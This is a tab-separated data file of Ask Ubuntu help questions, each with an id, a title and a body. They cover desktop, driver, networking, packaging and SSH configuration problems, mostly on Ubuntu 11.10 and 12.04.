144148	xrandr shows vga1 as disconnected	i have a thinkpad w520 with nvidia optimus graphics . i have disabled the nvidia card in bios ( by selecting `` integrated graphics '' ) , so i 'm running only on the integrated intel graphics . i get full 3d acceleration , which would suggest the drivers are properly installed . however , i 'm not able to use an external monitor . with the external monitor connected and turned on , running xrandr always gives : $ xrandr screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 lvds1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1920x1080 60.0*+ 59.9 50.0 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) what gives ? it sees the vga1 port ( to which the external display is connected ) , but it appears disconnected . i have tried forcing a resolution as per these instructions , but when i do that x becomes unresponsive and i have to ctrl-alt-f1 and restart it .
144151	libreoffice icons missing from unity task panel	after installing 12.04 , i removed the libreoffice icons from the left task panel to reduce clutter . however , now when i start libreoffice from the home button , the icons do not reappear in the launcher as a running program . in addition , they do n't appear in the alt-tab menu either . all other applications ( chrome , terminal , etc ) seem to work fine . is there some way to restore the icons ?
144152	ubuntu upgrade breaks firefox	i upgraded ubuntu , but the upgrade broke firefox , adobe flash plugin and corrupted the package database . i ran the suggested catalog repair , no change . i ran apt-get -f install , no change . i ran apt purge packagename , no change . how can i resolve this circular dependency ? here are some details : installarchives ( ) failed : dpkg : dependency problems prevent configuration of adobe-flashplugin : firefox ( 12.0+build1-0ubuntu0.12.04.1 ) breaks adobe-flashplugin ( < = 11.1.102.63-0precise1 ) and is installed . version of adobe-flashplugin to be configured is 10.0.32.18-1intrepid1 . dpkg : error processing adobe-flashplugin ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of adobe-flash-properties-gtk : adobe-flash-properties-gtk depends on adobe-flashplugin ( = 11.2.202.235-0precise1 ) ; however : version of adobe-flashplugin on system is 10.0.32.18-1intrepid1 . dpkg : error processing adobe-flash-properties-gtk ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : adobe-flashplugin adobe-flash-properties-gtk error in function : dpkg : dependency problems prevent configuration of adobe-flash-properties-gtk : adobe-flash-properties-gtk depends on adobe-flashplugin ( = 11.2.202.235-0precise1 ) ; however : version of adobe-flashplugin on system is 10.0.32.18-1intrepid1 . dpkg : error processing adobe-flash-properties-gtk ( -- configure ) : dependency problems - leaving unconfigured
144153	can i make launcher icons dark/dim unless app is running ( then in color ) ?	to improve visibility of what launcher-applications i have running ( instead of relying solely on that small right-facing triangle ) , is it possible to make launcher-icons default to a black & white/dark/dim state ? and then when a launcher-icon is clicked ( or the super+ # shortcut used ) that icon would gain color and backlight signifying the app is running ? if the launcher icon 's app is not running , it is dimmed out . if the icon 's app is running , it is showing in color and backlit . i 'd prefer an `` inhouse '' solution as opposed to having to install additional software , but i 'm interested in hearing all options for if this is possible .
144160	is it possible to run chromiumos as a session ?	is it possible to install chromiumos within ubuntu ? i am not looking for dual boot . i want to use as a session like unity or gnome-shell . please let me know if anyone has tried it .
144162	how do i remotely patch openssh to allow handshake obfuscation ?	i believe that my chinese isp has started detecting and bandwidth-limiting ssh connections . i 'm not using the default ssh port so i suspect that they are using deep packet filtering to detect the unencrypted handshake . i am aware of one solution to this which patches openssh to encrypt the handshake . however , i have two problems : this project is three years old so if i were to just compile it as is , i would be forsaking three years of security updates for openssh . my server is in the us and my only way of accessing it is through ssh -- so downtime or messing up is n't an option . as such i have two questions : can i somehow patch a current version of openssh to use the obfuscated handshake ? if so , how would i do this ? which files would i need to add/modify in the source ? how could i avoid any downtime for the ssh server while doing this patch ? can i install two ssh servers side by side ? if anyone could help me with this -- or knew of a better way to obfuscate ssh handshakes -- my appreciation would be boundless !
144165	unable to detect windows hard drive while running ubuntu 12.04 from usb	i am completely new to ubuntu . i experimented with ubuntu 12.04 by running it from a usb drive , in-order to recover files from my hard disc . history : my laptop is an ibm r60 running windows 7 . suddenly it gave me an error stating `` error 2100 - hard drive initialization error '' . i have read all the forums and most of them suggested that i remove and replace my hdd and that did not work . and one site suggested to try using ubuntu to recover files . i booted my system from usb , and once ubuntu came up , i choose `` try ubuntu '' . it came up fine and i was able to surf , and do other things , etc . i was unable to to access my files which are on the hard disc and `` attached devices '' is grayed out . 1- is there any way to gain access to my hard disc to recover the files ? how do i navigate to search for my files . 2- is it just simply not possible if the hard disc themselves are not working ? is that why i`m unable to find the drives . i know its a very novice question , but hoping someone would help me out . thank you , eapen
144166	how to change default date output format in date command ?	i used redhat as server and now i 've just installed ubuntu server . the problem is the output date format in logs is diffrent from redhat . when i use date command it show wen may 30 20:00 2012 now i want to change it to 2012.5.30.20:00 pleas help me to do that . by the w
144169	how do i change the window theme using bash ?	in ubuntu 12.04 , how will i be able to set the gnome window theme with a bash command ? this no longer works ( it used to in the previous releases ) gconftool-2 -- set -- type string /apps/metacity/general/theme 'adwaita'
144175	what happens if i delete a profile in apparmor	i would like to what happens a program if the apparmor profile associated with it is deleted . would it run as if it had unconstrained access ?
144178	how to distribute python gtk applications ?	this is in correlation with the previous question i asked here . my aim is to create and package an application for easy installation in ubuntu and other debian distributions . i understand that the best way to do this is by creating .deb file with which users can easily install my application on their system . however , i would also like to make sure my application is available in multiple languages . this is why i raised the question before which you can read here . in the answers that were provided , i was asked to use disutils for my packaging . i am however missing the bigger picture here . why is there a need to include a setup.py file when i distribute my application in .deb format ? my purpose is to ensure that users do not need to perform python setup.py to install my application but rather just click on the .deb file . i already know how to create a deb file from the excellent tutorial available here . it clearly shows how to edit rules , changelog and everything required to create a clean deb file . you can look at my application source code and folder structure at github if it helps you better understand my situation . please note i have glanced through the official python documentation found here . but i am hoping that i would get an answer which would help even a lame man understand since my knowledge is pretty poor in this regard .
144181	ca n't connect to samsung clx-3175 laser printer	i have installed ubuntu 12.04 . my computer no longer recognises my laser printer - samsung clx-3175 - and will not install the drivers , refusing to run the scripts downloaded from the samsung site . how can i fix this ?
144182	ubuntu wo n't use my nvidia driver	i 'm running ubuntu 12.10 on a laptop that has both intel integrated graphics and an nvidia geforce 540m . i installed the drivers properly , but i ca n't manage to actually use them . i 'm stuck in 640x480 resolution and the drivers are n't detected anywhere . each time i open the nvidia settings menu it says : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run 'nvidia-xconfig ' as root ) , and restart the x server . runinng nvidia-xconfig as root does not help . anybody have any ideas ?
144188	how to add a link group to update-alternatives ?	edit : solved , see resolution below is it possible to add a custom link group to update-alternatives that is not already there by default ? for example , i want to add scala and all its supporting binaries as a link group 'scala ' . i 'm trying using this script , but keep getting the error : update-alternatives : error : unknown argument `' i 'm not sure what that means , but after troubleshooting the script a bit with no luck , i 'm wondering if update-alternatives has a hard-coded list of link groups , that ca n't be added to , and that does n't include scala .
144190	add entry to the system settings	using gnome-shell my menu is full of setting-apps i wanted to have all of them centralised in one place , so i wonder if it 's possible to add custom entrys for those to the system settings panel ? thx in advance , janus
144202	no libreoffice icon in applications bar	when opening a libreoffice document , the icon appears briefly in the application-menu bar then disappears , letting no way to retrieve the window if minimized . alt+tab does not show the window either . big problem . config : ubuntu 12.04 , libreoffice 3.5.4 ( same problem with 3.5.3 ) . was ok with ubuntu 11.10 i tried to select `` kde compatible '' in compizeconfig but did not help .
144204	create launcher in ubuntu 12.04	i have just upgraded to ubuntu 12.04 and have installed eclipse ( as i am into android coding ) . i downloaded the tar.gz file for eclipse and unpacked into a folder on my file system . now everytime i need to go to that folder and run the executable unlike the other applications that i start using the dash board ( just by typing there name ) . how can i make the eclipse executable list on my dashboard ? i have heard of one possible solution - create a launcher icon on the desktop for eclipse . but on the latest release of ubuntu there is no such option . how do i go about this if it is the only solution ? thank you in advance .
144205	cisco vpn not working	i want to connect to my university 's cisco vpn from home , but it always fails . today i took my laptop to university to see if the it guys could help ( they could n't ) and it worked there so the configuration is ok . the router is not blocking anything since it works in windows ( i have linux installed alongside windows 7 ) i followed this pdf guide from my university and installed vpnc and network-manager-vpnc-gnome for the setup . after doing $ less /var/log/syslog | grep networkmanager the results were networkmanager [ 591 ] : < info > starting vpn service 'vpnc ' ... networkmanager [ 591 ] : < info > vpn service 'vpnc ' started ( org.freedesktop.networkmanager.vpnc ) , pid 14877 networkmanager [ 591 ] : < info > vpn service 'vpnc ' appeared ; activating connections networkmanager [ 591 ] : < info > vpn plugin state changed : init ( 1 ) networkmanager [ 591 ] : < info > vpn plugin state changed : starting ( 3 ) networkmanager [ 591 ] : < info > vpn connection 'tudelft ' ( connect ) reply received . networkmanager [ 591 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) networkmanager [ 591 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) : no ifupdown configuration found . networkmanager [ 591 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) networkmanager [ 591 ] : < warn > vpn plugin failed : 1 networkmanager [ 591 ] : < info > vpn plugin state changed : stopped ( 6 ) networkmanager [ 591 ] : < info > vpn plugin state change reason : 0 networkmanager [ 591 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . networkmanager [ 591 ] : < info > policy set 'poptn164 ' ( wlan0 ) as default for ipv4 routing and dns . networkmanager [ 591 ] : < info > vpn service 'vpnc ' disappeared i also have tried kvpnc , and it still does n't work . kvpnc says : `` error : unable to find `` vpnclient '' at usr/local/bin/vpnclient '' i 'm a newbie to linux , so if you need any other information , please ask and i 'll try to provide it . i 'm using ubuntu 12.04 .
144206	ubuntu 11.10 download and install problems	i m having lot of problems in my newly install ( also in fresh installed copy ) of ubuntu 11.10 whenever i try to download any software the download stuck at certain point always e.g . teamviewer 14.4 mb , google chrome 26.7 mb . if i tried sudo apt-get- upgrade it will stuck at [ waiting for headers ] same happens with sudo apt-get install mysql-server install & download ... i ca n't determine the problem . i tried switching server from india to main server still the problem continues ... .. can someone please solve this problem
144208	how do i make ubuntu use only free software ?	during the install , there is an option to make ubuntu use only free software . is there a way to toggle this option now that it is installed ? thanks .
144211	restricting ssh users to certain access permissions	is there a method to restrict ssh users to certain access rights for certain programs ( such as python , perl , ruby , java , etc ) , but also a method to restrict them from leaving their /home/ directories ?
144213	how to add a system wide equalizer in ubuntu 12 ?	i found many posts about 'pulseaudio-equalizer ' but it does n't seem to work anymore . i tried to install it with apt-get . anyone else with sound configuration problems in ubuntu 12 ? my sound comes out with too much bass . i 'm sure it 's not a problem in my headphones or anything else . it 's the sound configuration , which is not possible to change with the default tools . alsamixer helped me to disable 'front mi ' . i do n't know what that is , but when i muted it , all the noise was removed . so now all i need to do is turn down the bass .
144220	how can i connect 2 laptops using bluetooth of ubuntu 11.10 & transfer files ?	i have used `` hcitool scan '' command but it can'nt find any address of other laptops but can detect phones . how can i connect 2 laptops ?
144222	how do `` apt-get clean '' and `` apt-get clean all '' differ ?	what , if anything , is the difference between this command : sudo apt-get clean and this command : sudo apt-get clean all on my lubuntu 12.04 system , simulating these commands reveals their behavior to be exactly the same : ek @ apok : ~ $ apt-get -s clean note : this is only a simulation ! apt-get needs root privileges for real execution . keep also in mind that locking is deactivated , so do n't depend on the relevance to the real current situation ! del /var/cache/apt/archives/* /var/cache/apt/archives/partial/* del /var/cache/apt/pkgcache.bin /var/cache/apt/srcpkgcache.bin ek @ apok : ~ $ apt-get -s clean all note : this is only a simulation ! apt-get needs root privileges for real execution . keep also in mind that locking is deactivated , so do n't depend on the relevance to the real current situation ! del /var/cache/apt/archives/* /var/cache/apt/archives/partial/* del /var/cache/apt/pkgcache.bin /var/cache/apt/srcpkgcache.bin ek @ apok : ~ $ is there ever any difference in apt-get 's behavior with clean and clean all ? if so , what is the difference , under what circumstances is it relevant , and how should i choose between the two ? if there is no difference , then why does clean all exist ? if they 're the same , then clean all would still make sense if clean could ordinarily take a package name as an argument . but this is not the case -- attempting to pass a package name to clean does n't alter clean 's behavior at all , the whole cache still gets deleted : ek @ apok : ~ $ apt-get -s clean nano note : this is only a simulation ! apt-get needs root privileges for real execution . keep also in mind that locking is deactivated , so do n't depend on the relevance to the real current situation ! del /var/cache/apt/archives/* /var/cache/apt/archives/partial/* del /var/cache/apt/pkgcache.bin /var/cache/apt/srcpkgcache.bin this does make me wonder , though , if perhaps clean all does n't really exist ( and that what 's happening is that all is ignored , just as nano was in the above example ) . is clean all just an urban legend ?
144228	unable to find to which port my android is connected	i am trying to connect my sony ericsson xperia x10 mini to my ubuntu 11 ( 64 bits version ) , however , the device does not appear on /dev/ . i am willing to send at commands through terminal to my phone , but i can not find the name of the file to which it is connected . could someone help me ?
144231	how to dynamically resize gtk notebook pages	i 've got a python app that uses a gtk.notebook widget to display different pages . each of these pages contain a different set of widgets , and i 've noticed that the 'tallest ' widget in terms of vertical space defines the overall vertical size of the notebook . but i 'd actually like my app to resize the pages to not waste vertical space , and adapt , that is , get resized to the same vertical size as the widget they contain . this resize should happen when i select each page . here 's the sample code to generate this notebook ( the example contains a widget per page for the sake of simplicity ) so in short , how can i dinamically resize notebook pages upon selecting them , so that their vertical space is adapted to be the same as their child widget ?
144235	locale variables have no effect in remote shell ( perl : warning : setting locale failed . )	i have a fresh ubuntu 12.04 installation . when i connect to my remote server i got errors like this : ~ $ ssh example.com sudo aptitude upgrade ... traceback ( most recent call last ) : file `` /usr/bin/apt-listchanges '' , line 33 , in < module > from alchacks import * file `` /usr/share/apt-listchanges/alchacks.py '' , line 32 , in < module > sys.stderr.write ( _ ( `` ca n't set locale ; make sure $ lc_* and $ lang are correct ! \n '' ) ) nameerror : name '_ ' is not defined perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_time = `` de_de.utf-8 '' , lc_monetary = `` de_de.utf-8 '' , lc_address = `` de_de.utf-8 '' , lc_telephone = `` de_de.utf-8 '' , lc_name = `` de_de.utf-8 '' , lc_measurement = `` de_de.utf-8 '' , lc_identification = `` de_de.utf-8 '' , lc_numeric = `` de_de.utf-8 '' , lc_paper = `` de_de.utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_all to default locale : no such file or directory no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . ... i do n't have this problem when i connect from an older ubuntu installation . this is output from my ubuntu 12.04 installation , lang and language are set $ locale lang=de_de.utf-8 language=de_de : en_gb : en lc_ctype= '' de_de.utf-8 '' lc_numeric=de_de.utf-8 lc_time=de_de.utf-8 lc_collate= '' de_de.utf-8 '' lc_monetary=de_de.utf-8 lc_messages= '' de_de.utf-8 '' lc_paper=de_de.utf-8 lc_name=de_de.utf-8 lc_address=de_de.utf-8 lc_telephone=de_de.utf-8 lc_measurement=de_de.utf-8 lc_identification=de_de.utf-8 lc_all= does anybody know what has changed in ubuntu to get this error message on remote servers ?
144237	how do i uninstall ubuntu wubi ?	i want to uninstall ubuntu because i just do n't like it ... i have windows 7 and no boot disk or anything special to uninstall , when i installed ubuntu it said easy to uninstall and i would love to know how to actually uninstall it . thank you .
144239	ubuntu 12.04 upgrade and thunderbird	after applying the suggested updates ( 179 ) an error message at the very end of the process suggested me to run apt-get install -f. since it is a fairly new ubuntu install ( x86 ) i did n't setup anything in thunderbird yet . different error messages ( see details ) were generated with the -f process : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : thunderbird suggested packages : latex-xft-fonts the following packages will be upgraded : thunderbird 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/20.8 mb of archives . after this operation , 594 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 170457 files and directories currently installed . ) preparing to replace thunderbird 11.0.1+build1-0ubuntu2 ( using ... /thunderbird_12.0.1+build1-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement thunderbird ... dpkg-deb ( subprocess ) : data : internal gzip read error : ' < fd:4 > : invalid code lengths set ' dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing /var/cache/apt/archives /thunderbird_12.0.1+build1-0ubuntu0.12.04.1_i386.deb ( -- unpack ) : short read on buffer copy for backend dpkg-deb during `./usr/lib/thunderbird/libxul.so' errors were encountered while processing : /var/cache/apt/archives/thunderbird_12.0.1+build1-0ubuntu0.12.04.1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
144245	ubuntu 12.04 minimal installation	first of all i do n't have much knowledge about linux stuff . so , i am planning to buy a netbook this week and was thinking of installing ubuntu 12.04 on it . is there any version of ubuntu 12.04 available to download which asks user to which package/applications the user wants to install or not so that i can get a minimal distribution for my system . for , example i was thinking of using xfce or lxde as my default desktop environment . so , the ubuntu cd let me choose whether or not i want to install gnome/unity on my current system and at a latter stage when my installation is complete i can manually install xfce or lxde . also is this the correct way to install other desktop environments or one should first do a complete install of ubuntu and than remove and install a de of his choice.so , if this is not the correct way than can you please point me to the correct way to achieve the other option i mentioned . please give ubuntu specific anwers because i know i can get the above configuration using xubuntu or lubuntu .
144246	how to install brother mfc-9120cn scaner ?	i need to use the scanner on my brother mfc-9120cn printer , i 'm using kubuntu 12.04. please help .
144248	i ca n't check for updates	after i installed some updates i restarted my computer . some days later i wanted to check for updates because the `` update-manager '' shows me the following : `` the packet information has been updated last 24 days ago . '' and a window appeared . that window after downloading packages , said that : failed to download the information from the repository check your internet connection details : w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey 5a9a06aef9cb8db0 , w : failed to fetch http : //ppa.launchpad.net/jsevi83/unity/ubuntu/dists/oneiric/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/jsevi83/unity/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found , w : failed to fetch gzip : /var/lib/apt/lists/partial/ar.archive.ubuntu.com_ubuntu_dists_oneiric_universe_i18n_translation-en encountered a section with no package : header , e : some index files failed to download . they have been ignored , or old ones used instead . but my internet connection works fine . what do i have to do ?
144259	application starts as terminal but not as a desktop entry	i just installed sql anywhere 12 and can start sybase central from the terminal with the command line below without errors : /opt/sqlanywhere12/bin32/scjview however , when i try to start it from a desktop entry i am receiving two error messages that could be something incorrectly defined in the desktop below : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false icon [ en_us ] =gnome-panel-launcher name [ en_us ] =sybase central exec=/opt/sqlanywhere12/bin32/scjview comment [ en_us ] = name=sybase central comment= icon=gnome-panel-launcher here are the error messages : ( unable to post the error images ) can not find libsyblib610_r.so can not find libulscutil12.so since the application can be successfully started from a terminal window i was wondering how i could have it setup as a desktop entry as well .
144266	can i install ubuntu on a windows computer without affecting other users ?	i want to install ubuntu but i do not want it to affect all users ; the others do not want it . is it possible to have ubuntu only installed for one user ( without affecting others ) ?
144267	x server crash ( eq overflowing )	i 'm running ubuntu 12.04 with lightdm and awesome window manager on a macbook pro 6,2 ( nvidia and integrated intel gpus ) . i 'm also using macfanctld and pommed , in case that 's helpful . my grub config uses `` quiet novesa nopat '' , as i read that the latter two can sometimes interfere with the loading of graphics drivers later on during boot . though , apparently it did n't . randomly , ( last time was when opening an email message , another was opening a new tab in chrome , etc . ) my display will turn off . no input works , i ca n't change to another tty to shut down lightdm . i just have to do a hard reset of the computer . the keyboard backlight does n't turn off , but the monitor backlight does seem to go away . the only other thing i notice is that after about 5 seconds , the fans start spinning at max speed . i 'm not sure if there 's a consistent time between the crashes either . last time it was 36 hours , another was 24 . last week it happened every hour , sometimes less . my friend told me this is a known problem with radeon cards , but i do n't have a radeon . here are the final thoughts of the xorg log file : http : //pastebin.com/tbu8bwyd is there a way to fix this ? edit : : i just noticed that the pastebin did n't nab the last two lines of the log , so i 've pasted them below : [ 103550.059 ] [ mi ] mieq is *not* the cause . it is a victim . [ 103551.489 ] ( ww ) nvidia ( 0 ) : wait ( 2 , 6 , 0x8000 , 0xdfff2fff , 0x00008470 ) edit 2 : : some googling shows that this appears to have been reported as a bug in march : https : //bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers/+bug/973096 but , is there anyway i can fix this , or do i have to be content with it crashing periodically ?
144270	ca n't copy my music from rhythmbox to my iphone	i am using rhythmbox ( 2.96 ) using a iphone 4.2.1 . i installed the libimobiledevice sudo apt-get install ipheth-utils libimobiledevice-dev libimobiledevice-utils but when i drag and drop a .mp3 file on my iphone icon via rhythmbox . it wo n't start working .
144272	ip route with two default gateways	so i have this challenge , and i 've searched the internet high and low . learned a lot - but im still having some issues regarding my two gateway setup , which i really want to accomplish . i have two gateways , for various reasons and i am trying to get the two nics to behave . my problem is with the secondary gateway ( gateway2 ) , since everything works with gateway1 and eth0 , default route and everything . so first off , my setup looks somewhat like this : nat ( in ) = cisco asa nat ( out ) = zyxel whatever wan-ip nat ( in ) - - - - - - - - - - ubuntu box 12.04 - - - - - - - - - - - - nat ( out ) gateway1 10.0.0.1 < - > 10.0.0.50 ( eth0 ) || ( eth1 ) 192.168.0.50 < - > 192.168.0.1 . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - gateway2 so i went to : 1 . create new table : `` 1 zyxelwan '' within `` /etc/iproute2/rt_tables '' 2 . create routing policy for table ( zyxelwan ) ip route add 192.168.0.0/24 dev eth1 src 192.168.0.50 table zyxelwan ip route add default via 192.168.0.1 dev eth1 table zyxelwan 3 . set the ip rules which makes use of the newly-created routing table : ip rule add from 192.168.0.50 table zyxelwan ip rule add to 192.168.0.50 table zyxelwan i have left out other configurations ( for now ) to ensure that i was running lighest-possible-config . and it is as if my ip rules are being completely ignored , see here some of the outputs i get after the above mentioned steps . route -n kernel ip routing table destination gateway genmask flag metric ref use iface 0.0.0.0 10.0.0.1 0.0.0.0 ug 100 0 0 eth0 10.0.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 can not see the table ive configured , but if i try to apply the routing commands to the table again , i get `` file already exists '' . so the config should be there somewhere . but when i try to tracepath i.e . 8.8.8.8 , i get this result : tracepath 8.8.8.8 1 : 10.0.0.50 0.161ms pmtu 1500 so i tried to delete the gateway , from which it tried to send the traffic ( 10.0.0.1 ) - with this result ( this should seems to be regardless my ip rules & table ) . : tracepath 8.8.8.8 1 : send failed resume : pmtu 65535 and if i write the route , ommiting the table , and replace the previous default route with : route add default via 192.168.0.1 dev eth1 it will ofc work , but id really like being able to ssh/vpn into the ubuntubox from my cisco gateway and then access the network on my zyxel gateway - am i missing something dreadfully obvious , or are you smart ppl out there able to point me in the right direction ? i was thinking according my ip rules , it could be as if it only `` listens '' for traffic , and will direct it out the same interface - according to the table/ip rules - and the solution might just have been `` switching the cables around '' ? anyhow , thank you in advance for any suggestions : )
144278	cd writer not showing in ftab	hi i 'm using the april edition of ubuntu 12.04 when i try to use my cd it 's not detected it shows up in disk manager , it is not listed in fstab , when i did a checkdisk for devise it gave the following detected cd-r drive : /dev/sr0 using /dev/cdrom of unknown capabilities device type : removable cd-rom version : 5 response format : 2 capabilities : vendor_info : 'hl-dt-st' identification : 'cd-rom gcr-8523b' revision : '1.02' device seems to be : generic mmc cd-rom . wodim : sorry , no cd/dvd-recorder or unsupported cd/dvd-recorder found on this target . can anyone tell me what is happening , as everything worked before updating from 11.10 thanks !
144280	can not ssh into ubuntu server by hostname	i just set up ubuntu 12.04 server on an old box laying around , connected to my router via ethernet . i set up openssh-server as instructed for remote access , but i can not ssh into it from my laptop using the hostname . strangely though , i can ssh into it using the ip address . i would really like to fix this for the sake of convenience . i notice there are a few similar questions , but it seems all these people had some idea of what direction to go in to fix the problem , and were asking slightly more specific , technically-worded versions of my questions . as a complete beginner to home networking , i would majorly appreciate if someone would tell me where to go from here .
144281	12.04 failed install	running 9.04 ( see launchpad question # 198606 ) . downloaded ubuntu-12.04-desktop-i386.iso , ran usb startup disk creator ( which installed 100 % on usb drive ) , boot from usb fails . “unknown keyword in configuration file . boot : ”
144284	workspace switcher does not highlight active workspace	i recently upgraded from 11.04 to 11.10 and i am running gnome-session-fallback . everything is working perfectly fine for me except that in the workspace switcher at the bottom left there is no white border around the active workspace . non-minimized windows in workspaces appear as white boxes inside the workspace , and a maximized window will appear as a white box ( although without the program icon inside as i am used to with programs such as eclipse and firefox ) . the active window does have a very slight glow inside it , but if your active window is small ( e.g . a terminal window , calculator , nautilus , upgrade-manager , etc ) it is difficult to discern this as the borders do n't change , the interior of the box just gets a shade lighter . there is no indication at all of which workspace you are on and i 'd like to restore this functionality as currently there is no way to differentiate between maximized windows ( as both the program icon and the active workspace highlight functionalities are gone ) . this shows an image of my workspace switcher . when this was taken i was on workspace 4 . firefox was open full-screen in workspace 1 and eclipse was open full-screen in workspace 2 with a vm in a small window on top of it . as you can see there is no indication that you are currently on workspace 4 . does anyone know how to restore either the white border around the currently active workspace or the program icon inside maximized windows in the workspace switcher ( or both ) ?
144289	dual boot ubuntu 12.04 and windows 7 on two separate ssds with uefi	with the following setup i get a blinking cursor after installation : windows 7 64bit installed in first ssd ( not uefi , using mbr ) installation of ubuntu 12.04 64bit on gpt partioned disk seems to work without problems but does not boot . it stops with a blinking cursor . i used the partitioning scheme described here . partitioning scheme : sdb1 efi boot partition fat32 sdb2 root btrfs sdb3 home btrfs sdb4 swap is it possible to mix uefi bios with mbr and gpt when using two separate ssds ? i tried grub2 into a mbr as well but it would not install there ...
144290	crash after plugging in the logitech h600 wireless transmitter	i recently bought the logitech h600 wireless headset . when i plug in the usb wireless transmitter , ubuntu 12.04 lts crashes . how does that come and what do you suggest me to do ? same problem here , as soon as the h600 headset is plugged in 12.04 crashes . relevant snip from /var/log/xorg.failsafe.log is below , complete log can be found as a gist [ 2676.496 ] ( ** ) logitech logitech wireless headset : applying inputclass `` evdev keyboard catchall '' [ 2676.496 ] ( ii ) using input driver 'evdev ' for 'logitech logitech wireless headset' [ 2676.496 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 2676.496 ] ( ** ) logitech logitech wireless headset : always reports core events [ 2676.496 ] ( ** ) evdev : logitech logitech wireless headset : device : `` /dev/input/event16 '' [ 2676.496 ] ( -- ) evdev : logitech logitech wireless headset : vendor 0x46d product 0xa29 [ 2676.496 ] ( -- ) evdev : logitech logitech wireless headset : found absolute axes [ 2676.496 ] ( -- ) evdev : logitech logitech wireless headset : found absolute multitouch axes [ 2676.496 ] ( -- ) evdev : logitech logitech wireless headset : found keys [ 2676.496 ] ( ii ) evdev : logitech logitech wireless headset : configuring as mouse [ 2676.496 ] ( ii ) evdev : logitech logitech wireless headset : configuring as keyboard [ 2676.496 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2.2/2-1.2.2:1.3/input/input16/event16 '' [ 2676.496 ] ( ii ) xinput : adding extended input device `` logitech logitech wireless headset '' ( type : keyboard , id 10 ) [ 2676.496 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 2676.496 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 2676.496 ] ( ** ) option `` xkb_layout '' `` us '' [ 2676.497 ] ( ii ) evdev : logitech logitech wireless headset : initialized for absolute axes . [ 2676.497 ] backtrace : [ 2676.497 ] 0 : /usr/bin/x ( xorg_backtrace+0x37 ) [ 0xb7698637 ] [ 2676.497 ] 1 : /usr/bin/x ( 0xb7510000+0x18c3ba ) [ 0xb769c3ba ] [ 2676.497 ] 2 : ( vdso ) ( __kernel_rt_sigreturn+0x0 ) [ 0xb74ed40c ] [ 2676.497 ] 3 : /lib/i386-linux-gnu/libc.so.6 ( 0xb7155000+0x135d32 ) [ 0xb728ad32 ] [ 2676.497 ] 4 : /usr/bin/x ( xichangedeviceproperty+0x16c ) [ 0xb7630b0c ] [ 2676.497 ] 5 : /usr/lib/xorg/modules/input/evdev_drv.so ( 0xb3f4a000+0x634e ) [ 0xb3f5034e ]
144301	usb tethering from android	i used a friend 's android ( 2.3 ) phone that allows usb tethering , subheading : `` share phone 's mobile network with pc . '' android lets me set 2 tethering settings , under `` usb tethering type '' : windows mac os x naturally , linux is n't officially supported , but i suspect someone has run into this before . what do i need to on my ubuntu 12.04 setup to get it to recognize either of these connection types for usb tethering ?
144306	how do i use with ltsp with a dell fx170 thin client ?	just got a reconditioned dell optiplex fx170 thin client delivered , without an image . on power-up , i see the message : disk boot failure , insert system disk and press enter i am very sure all the wires etc are connected properly . i would like it to pxe boot and find my ltsp installation . i have an hp t5525 with the same connectivity that works fine . on f12 there 's a bios boot order menu . the only options available though are ls120 , the hdd , cd / dvd [ via usb presumably ] , and various usb options . i do not see 'pxe ' or any network card . and i do n't know how to change the boot order : ( any help appreciated !
144307	how can i deploy 32 and 64 bit versions of my application in the ubuntu 's software center under a single entry ?	i do n't know how or do n't see the option to have 32-bit and a 64-bit version of my application under the same entry in the ubuntu 's software center , and .deb packages can not contain multiple architectures right now .
144308	can i hear sound with two output devices at the same time ?	i want to hear sound with two separate audio output devices at the same time : my headphones and my tv-speakers . is it possible and how can i do it ?
